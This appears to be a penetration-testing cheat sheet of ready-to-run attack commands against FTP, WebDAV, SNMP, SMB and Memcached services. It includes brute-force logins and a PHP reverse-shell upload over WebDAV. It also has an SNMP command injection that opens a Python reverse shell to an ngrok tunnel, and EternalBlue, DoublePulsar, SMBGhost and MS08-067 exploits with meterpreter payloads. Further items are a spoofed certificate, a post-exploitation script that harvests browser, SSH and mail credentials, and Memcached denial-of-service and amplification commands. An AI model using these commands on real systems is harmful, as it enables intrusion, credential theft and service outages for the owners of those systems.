Network Configuration

Check List

Cheat Sheet

FTP

Nmap

Identify FTP

nmap -p 21 -sS -sV --mtu 5000 --script banner $WEBSITE

Anonymous Login

nmap -p 21 -sS -sV --mtu 5000 --script ftp-anon $WEBSITE

Brute Force

nmap -p 21 -sS -sV --mtu 5000 --script ftp-brute $WEBSITE

Browser Login

ftp://anonymous:anonymous@$TARGET

WGET

Download Files

wget --ftp-user=anonymous --ftp-password=anonymous ftp://$TARGET:21

FTP

CLI Login

ftp
open $TARGET 21

USER

> anonymous

PASS

> anonymous

FTP Mode

passive

Download File

get file.txt

Hydra

Brute Force

hydra -V -L /usr/share/seclists/Usernames/sap-default-usernames.txt -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt ftp://$TARGET:21

Metasploit

Recon Version

msfconsole -qx "use auxiliary/scanner/ftp/ftp_version;set RHOSTS $WEBSITE;run;exit"

Anonymous Login

msfconsole -qx "use auxiliary/scanner/ftp/anonymous;set RHOSTS $WEBSITE;run;exit"

Brute Force

msfconsole -qx "use auxiliary/scanner/ftp/ftp_login;set RHOSTS $WEBSITE;set USERPASS_FILE /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt;run;exit"

WebDAV

Nmap

Identify WebDAV

nmap -p 80,443 -sS -sV --mtu 5000 --script http-methods,http-webdav-scan $WEBSITE

Metasploit

Scan WebDAV

msfconsole -qx "use auxiliary/scanner/http/webdav_scanner;set PATH /webdav;set RHOSTS $WEBSITE;exit"

Hydra

Brute Force

hydra -V -L /usr/share/seclists/Usernames/sap-default-usernames.txt -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt $TARGET http-get /webdav/

DavTest

Scan WebDAV

davtest -url $WEBSITE

Upload Shell

davtest -url $WEBSITE -uploadfile /usr/share/webshells/php/php-reverse-shell.php -uploadloc shell.php

Listening

nc -lvnp 1234

Cadaver

cadaver $WEBSITE/webdav

PUT Web shell

put /usr/share/webshells/php/php-reverse-shell.php

Listening

nc -lvnp 1234

SNMP

Nmap

Identify SNMP

nmap -p 161 -sU -sV --mtu 5000 --script snmp-info $WEBSITE

Brute Force

nmap -p 161 -sU -sV --mtu 5000 --script snmp-brute $WEBSITE

SNMPWalk

Enumerate SNMP Public

snmpwalk -v1 -c public $TARGET

Onesixtyone

Enumerate SNMP Public

onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $TARGET

SNMPSet

SNMPv1

snmpset -v1 -c private $TARGET OID s "unk9vvn"

SNMPv2

snmpset -v2c -c private $TARGET sysName.0 s "unk9vvn"

Start Ngrok

ngrok http 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')

Inject RCE

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 $TARGET 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"$NGHOST\",443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

Execute Command

snmpwalk -v2c -c SuP3RPrivCom90 $TARGET NET-SNMP-EXTEND-MIB::nsExtendObjects

Metasploit

Enumerate SNMP Public

msfconsole -qx "use auxiliary/scanner/snmp/snmp_enum;set RHOSTS $WEBSITE;run;exit"

Enumerate SNMP Private

msfconsole -qx "use auxiliary/scanner/snmp/snmp_enum;set RHOSTS $WEBSITE;set COMMUNITY private;run;exit"

Enumerate Windows Users

msfconsole -qx "use auxiliary/scanner/snmp/snmp_enumusers;set RHOSTS $WEBSITE;run;exit"

Enumerate File Shares

msfconsole -qx "use auxiliary/scanner/snmp/snmp_enumshares;set RHOSTS $WEBSITE;run;exit"

SMB

Nmap

Identify SMB

nmap -p 139,445 -sS -sV --mtu 5000 --script smb-protocols,smb-os-discovery,smb2-capabilities $WEBSITE

Recon Vulns

nmap -p 139,445 -sS -sV --mtu 5000 --script smb-vuln-*,smb-double-pulsar-backdoor $WEBSITE

Brute Force

nmap -p 139,445 -sS -sV --mtu 5000 --script smb-brute $WEBSITE

Enumerate Users and Shares

nmap -p 139,445 -sS -sV --mtu 5000 --script smb-enum-users,smb-enum-shares $WEBSITE

Enumerate Domains and Groups

nmap -p 139,445 -sS -sV --mtu 5000 --script smb-enum-domains,smb-enum-groups $WEBSITE

Enumerate Services and Processes

nmap -p 139,445 -sS -sV --mtu 5000 --script smb-enum-services,smb-enum-processes $WEBSITE

netexec

Enum Host

netexec smb $TARGET

enum4linux

Enumerate Shares

enum4linux -a $TARGET

nbtscan

Enumerate Shares

nbtscan -r $TARGET/24

smbclient

User Enumeration and Null Sessions

smbclient -N -L //$TARGET

rpcclient

User Enumeration and Null Sessions

rpcclient -U "" $TARGET

Metasploit

Detect Version

msfconsole -qx "use auxiliary/scanner/smb/smb_version;set RHOSTS $TARGET;run;exit"

Enumerate Users

msfconsole -qx "use auxiliary/scanner/smb/smb_enumusers;set RHOSTS $TARGET;run;exit"

Enumerate Shares

msfconsole -qx "use auxiliary/scanner/smb/smb_enumshares;set RHOSTS $TARGET;run;exit"

Credential Dumps

msfconsole -qx "use auxiliary/scanner/smb/impacket/secretsdump;set RHOSTS $TARGET;run;exit"

Credential Brute Force

msfconsole -qx "use auxiliary/scanner/smb/smb_login;set RHOSTS $TARGET;set SMBUser Administrator;set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top100.txt;run;exit"

Detect EternalBlue

msfconsole -qx "use auxiliary/scanner/smb/smb_ms17_010;set RHOSTS $TARGET;run;exit"

Start Ngrok

ngrok http 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*;msfconsole -qx "use auxiliary/gather/impersonate_ssl;set RHOSTS google.com;run;exit"

Define ENV Cert

CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)

Post-EXP

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
bg
EOF

EternalBlue Exploit (ٌWin 7 to 10 - Win Server 2008 to 2012)

msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue;set PAYLOAD windows/x64/meterpreter/reverse_https;set RHOSTS $TARGET;set LHOST $NGHOST;set LPORT 443;set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 4444;set HandlerSSLCert $CERT;set StagerVerifySSLCert true;set StageEncoder true;set AutoRunScript /tmp/post-exp.rc;run -j"

Doublepulsar Exploit (ٌWin 7 to 10 - Win Server 2008 to 2012)

msfconsole -qx "use exploit/windows/smb/smb_doublepulsar_rce;set PAYLOAD windows/x64/meterpreter/reverse_https;set RHOSTS $TARGET;set LHOST $NGHOST;set LPORT 443;set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 4444;set HandlerSSLCert $CERT;set StagerVerifySSLCert true;set StageEncoder true;set AutoRunScript /tmp/post-exp.rc;run -j"

SMBGhost Exploit (Win 10)

msfconsole -qx "use exploit/windows/smb/cve_2020_0796_smbghost;set PAYLOAD windows/x64/meterpreter/reverse_https;set RHOSTS $TARGET;set LHOST $NGHOST;set LPORT 443;set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 4444;set HandlerSSLCert $CERT;set StagerVerifySSLCert true;set StageEncoder true;set AutoRunScript /tmp/post-exp.rc;run -j"

Net API Exploit (Win XP's)

msfconsole -qx "use exploit/windows/smb/ms08_067_netapi;set PAYLOAD windows/meterpreter/reverse_hop_http;set RHOSTS $TARGET;set LHOST $NGHOST;set LPORT 443;set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 4444;set HandlerSSLCert $CERT;set StagerVerifySSLCert true;set StageEncoder true;set AutoRunScript /tmp/post-exp.rc;run -j"

Memcached

Nmap

Identify Memcached

nmap -p 11211 -sS -sV --mtu 5000 --script memcached-info $WEBSITE

Netcat

Get Version

echo "version" | nc -vn -w 1 $TARGET 11211

Get Status

echo "stats" | nc -vn -w 1 $TARGET 11211

Get Slabs

echo "stats slabs" | nc -vn -w 1 $TARGET 11211

Get Items

echo "stats items" | nc -vn -w 1 $TARGET 11211

Get Key Names

echo "stats cachedump 1 10" | nc -vn -w 1 $TARGET 11211

Get Info Saved

echo "get $ITEM" | nc -vn -w 1 $TARGET 11211

Denial of Service

for i in {1..10000}; do echo "set key$i 0 0 1024" | nc $TARGET 11211; done

DDoS Amplification

echo -e "\x00\x00\x00\x00\x00\x01\x00\x00stats\n" | nc -u -q 1 $TARGET 11211

libmemcached-tools

Get Stats

memcstat --servers=$TARGET

Get all items

memcdump --servers=$TARGET

Get info inside the item(s)

memccat --servers=$TARGET $ITEM1 $ITEM2 $ITEM3

Metasploit

Extract Slabs

msfconsole -qx "use auxiliary/gather/memcached_extractor;set RHOSTS $TARGET;run;exit"

Denial of Service

msfconsole -qx "use auxiliary/dos/misc/memcached;set RHOSTS $TARGET;run;exit"
PreviousMisconfigurationNextApp Platform Configuration

Last updated

Was this helpful?